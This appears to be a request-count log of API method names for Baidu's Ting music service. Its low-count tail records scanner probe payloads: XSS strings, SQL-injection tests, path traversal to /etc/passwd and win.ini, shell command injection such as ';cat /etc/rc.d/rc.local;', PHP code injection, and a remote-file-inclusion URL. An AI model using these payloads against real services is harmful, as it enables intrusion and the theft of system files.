baidu.ting.song.getInfos	62584590
baidu.ting.song.baseInfo	27965764
baidu.ting.search.lrcpic	23067034
baidu.ting.search.catalogSug	22526836
baidu.ting.user.listenAge	17436888
baidu.ting.song.play	14467183
baidu.ting.search.common	13502473
baidu.ting.song.down	8810159
baidu.ting.song.lry	6908766
baidu.ting.user.getUserBaseInfo	6442412
baidu.ting.artist.getSongList	5322430
baidu.ting.user.checkSuggestVersion	5155164
baidu.ting.song.getInfo	5019899
baidu.ting.search.lrcys	4876289
baidu.ting.search.getPhotoInfos	4761598
baidu.ting.artist.getList	4748882
ting.baidu.diy.getPlaylists	4696013
baidu.ting.billboard.billList	4222387
baidu.ting.game.gamedetail	3334347
baidu.ting.diy.gedanInfo	3063313
baidu.ting.favorite.isCollect	3013137
baidu.ting.plaza.getRecommendAlbum	2977798
baidu.ting.user.checkComVersion	2917640
baidu.ting.plaza.active	2645584
baidu.ting.artist.getInfo	2642315
baidu.ting.radio.playAction	2506632
baidu.ting.user.config	2447339
baidu.ting.active.start	2399114
baidu.ting.song.playAAC	2283883
baidu.ting.plaza.getFocusPic	1842921
baidu.ting.diy.gedanHot	1621217
baidu.ting.search.suggestion	1367500
baidu.ting.album.getAlbumInfo	1332544
baidu.ting.artist.getinfo	1328718
baidu.ting.radio.getChannelSong	1258538
baidu.ting.diy.category	1254137
baidu.ting.diy.getSongFromOfficalList	1246115
ting.baidu.plaza.recdaily	1239297
baidu.ting.favorite.getCollectSong	1237702
baidu.ting.diy.addListenCount	1102647
baidu.ting.diy.getNowOfficalList	1050635
baidu.ting.plaza.recdaily	1019724
baidu.ting.plaza.getPartDesc	945604
baidu.ting.artist.getAlbumList	812588
baidu.ting.song.audio	751231
baidu.ting.user.RegistToImsg	710199
baidu.ting.diy.gedan	693399
baidu.ting.tag.songlist	645419
baidu.ting.tag.getHotTag	617937
	592116
baidu.ting.user.down	514008
baidu.ting.feedback.song	474237
baidu.ting.radio.getCategoryList	434786
baidu.ting.search.getPhotoInfo	385779
baidu.ting.search.lrcyss	348582
baidu.ting.billboard.billCategory	348404
baidu.ting.artist.get72HotArtist	289061
baidu.ting.diy.getPlaylists	273047
baidu.ting.favorite.getFavoriteSong	196402
baidu.ting.song.buffer	170902
baidu.ting.plaza.recommend	168581
baidu.ting.video.getList	156911
baidu.ting.game.gamelist	153134
baidu.ting.song.getMulInfos	142959
baidu.ting.favorite.addSongFavorites	131110
baidu.ting.tag.getAllTag	104392
baidu.ting.diy.search	103991
baidu.ting.diy.getSimilarGedan	94885
baidu.ting.diy.getOfficialDiyList	85839
baidu.ting.favorite.addSongFavorite	75444
baidu.ting.video.play	74949
baidu.ting.user.checkVersion	59345
baidu.ting.artist.getSpecialSongList	48486
baidu.ting.plaza.getNewSongs	44743
baidu.ting.favorite.delCollectSong	44165
ting.baidu.diy.getPlaylist	32220
baidu.ting.radio.getArtistChannelSong	26824
baidu.ting.radio.getFavoriteSong	23498
baidu.ting.diy.getPlaylist	18907
baidu.ting.radio.serv	18326
baidu.ting.plaza.getArtistPlaza	18210
baidu.ting.artist.getHighSongTitle	13999
baidu.ting.feedback.crash	12820
baidu.ting.user.nplogin	12652
baidu.ting.diy.saveList	12434
baidu.ting.album.getList	11089
ting.baidu.film.getFilmInfo	10487
baidu.ting.song.cloud	8483
baidu.ting.favorite.delSongFavorite	8222
baidu.ting.mv.getIndexMV	7237
baidu.ting.song.getMulInfo	7229
baidu.ting.artist.getQianQianArtist	7170
ting.baidu.song.lry	6807
baidu.ting.user.registToUC	5495
baidu.ting.diy.addListSong	5178
baidu.ting.weixin.response	4915
baidu.ting.diy.delList	4716
baidu.ting.diy.delListSong	4697
baidu.ting.user.logout	4497
baidu.ting.video.category	4244
baidu.ting.user.regPassport	3688
baidu.ting.billboard.catalog	3684
baidu.ting.user.getMessage	3456
baidu.ting.artist.getHighSongList	3241
baidu.ting.colorRing.listen	2956
baidu.ting.user.getMobileVcode	2469
baidu.ting.colorRing.authset	2444
baidu.ting.colorRing.getCode	2385
baidu.ting.mv.playMV	2361
baidu.ting.favorite.delSongFavorites	2315
ting.baidu.artistapp.renum	1936
baidu.ting.diy.getRecommendSpeical	1533
baidu.ting.feedback.info	1476
baidu.ting.artist.getSongRank	1348
baidu.ting.artist.getSong	1346
baidu.ting.favorite.getFavoriteAlbum	1313
baidu.ting.diy.upList	1133
baidu.ting.artist.getSongVote	861
baidu.ting.favorite.getListenHistory	789
baidu.ting.diy.addList	786
ting.baidu.artistapp.brief	679
baidu.ting.video.recMv	580
baidu.ting.favorite.getOffenListenList	434
baidu.ting.colorRing.subscribe	434
baidu.ting.mv.searchMV	393
ting.baidu.search.lrcpic	377
baidu.ting.song.getSuoSongInfo	374
baidu.ting.artist.getInfoByName	306
baidu.ting.user.activate	295
baidu.ting.mv.getMultiSongMVInfo	249
baidu.ting.colorRing.toneselect	231
baidu.ting.artistapp.photo	188
baidu.ting.user.login	182
baidu.ting.favorite.getInfoFromView	172
baidu.ting.favorite.addAlbumFavorite	156
ting.baidu.artistapp.newList	143
baidu.ting.plaza.getMisNewSong	127
ting.baidu.artistapp.news	124
baidu.ting.song.getHash	106
baidu.ting.artist.getInfoList	64
baidu.ting.favorite.delAlbumFavorite	55
baidu.ting.user.addPassportInfo	46
baidu.ting.game.catalog	45
ting.baidu.mv.getindexmv	45
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	38
ting.baidu.artistapp.briefs	36
baidu.ting.mv.getMVCategory	32
baidu.ting.album.getAlbumstyle	28
baidu.ting.game.gameplay	11
ting.baidu.colorring.listen	9
baidu.ting.outerPassport.profile	9
ting.baidu.song.play	8
ting.baidu.user.getmessage	8
baidu.ting.favorite.getFavoriteSongCount	7
(	7
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
\' (	6
ting.baidu.video.getlist	6
baidu.ting.user.checkNameUsed	6
ting.baidu.game.gamedetail	4
baidu.ting.song.play\';alert(1);\'	4
ting.baidu.radio.getFavoriteSong	4
ting.baidu.mv.getArtistMVInfo	4
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
set	3
c:/windows/win.ini	3
ting.baidu.search.common	3
ting.baidu.album.getAlbumInfo	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	3
1\';cat /etc/rc.d/rc.local;\'	3
ting.baidu.search.catalogSug	3
http://cirt.lnet/rfiinc.txt_	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	3
baidu.ting.song.play\') and 8288=8288 and (\'	2
${@print(md5(812812))}	2
ting.baidu.song.audio	2
baidu.ting.push.send	2
../../../../../../../../../../etc/rc.d/rc.local_	2
baidu.ting.song.play<script>confirm(1)</script>	2
baidu.ting.song.play</script><script>alert(1);//	2
../../../../../../../../../../etc/rc.d/rc.local	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	2
http://cirt.lnet/rfiinc.txt	2
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	2
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	2
baidu.ting.song.play\' and \'8281\'=\'8281	2
../../../../../../../../../../etc/passwd_	2
file:///etc/passwd	2
/usr/bin/id;	2
baidu.ting.song.playjavascript:alert(1)	2
ting.baidu.search.playback	2
ting.baidu.plaza.active	2
baidu.ting.song.play\'\";alert(1);//	2
ting.baidu.plaza.recommend	2
ting.baidu.game.catalog	2
baidu.ting.song.play\";alert(1);\"	2
file:///etc/rc.d/rc.local_	2
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	2
http://10.42.7.217/?1384884082.08	2
1\\\";cat /etc/rc.d/rc.local;\\\"	2
baidu.ting.song.lry\';alert(1);\'	2
ting.baidu.mv.getMultiSongMVInfo	2
baidu.ting.song.play;alert(1);//	2
ting.baidu.feedback.crash	2
ting.baidu.artistapp.send	2
baidu.ting.song.play>\'>\"><script>alert(1)</script>	2
file:///etc/rc.d/rc.local	2
file:///etc/passwd_	2
ting.baidu.mv.playmv	2
%{	2
1;cat /etc/rc.d/rc.local;	2
c:/windows/win.ini_.jpeg	2
ting.baidu.diy.gedan	2
\'];${@print(md5(812812))};//	2
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	2
ting.baidu.plaza.getFocusPic	2
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
baidu.ting.song.play</textarea></title><script>alert(1)</script>	2
baidu.ting.song.play--></script><script>alert(1)</script>	2
c:/windows/win.ini_	2
baidu.ting.song.lry--></script><script>alert(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	1
../../../../../../../../../../etc/rc.d/rc.local_.html	1
../../../../../../../../../../etc/rc.d/rc.local_.php	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.html	1
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	1
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.song.lry</script><script>alert(1);//	1
baidu.ting.song.lry<script>confirm(1)</script>	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	1
baidu.ting.song.lry\') and 8288=8288 and (\'	1
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.lry\' and \'8281\'=\'8281	1
ting.baidu.colorRing.listen	1
baidu.ting.favorite.addSongFavoriteByIds	1
../../../../../../../../../../etc/passwd	1
baidu.ting.song.lryjavascript:alert(1)	1
baidu.ting.song.lry\'\";alert(1);//	1
http://cirt.lnet/rfiinc.txt_.jpeg	1
file:///etc/passwd_.htm	1
c:/windows/win.ini_.jpg	1
http://cirt.lnet/rfiinc.txt_.html	1
baidu.ting.song.lry\";alert(1);\"	1
http://cirt.lnet/rfiinc.txt_.php	1
file:///etc/rc.d/rc.local_.html	1
baidu.ting.song.lry;alert(1);//	1
string:{var_dump(md5(812812))}	1
file:///etc/rc.d/rc.local_.php	1
file:///etc/rc.d/rc.local_.htm	1
ting.baidu.song.down	1
baidu.tinmat=json	1
${	1
baidu.ting.billboard.bmllList	1
file:///etc/passwd_.html	1
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	1
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	1
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	1
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	1
baidn	1
ting.baidu.colorRing.getcode	1
baidu.ting.sgid=11276181	1
baidu.ting.sgid=0	1
baidu.ting.art1	1
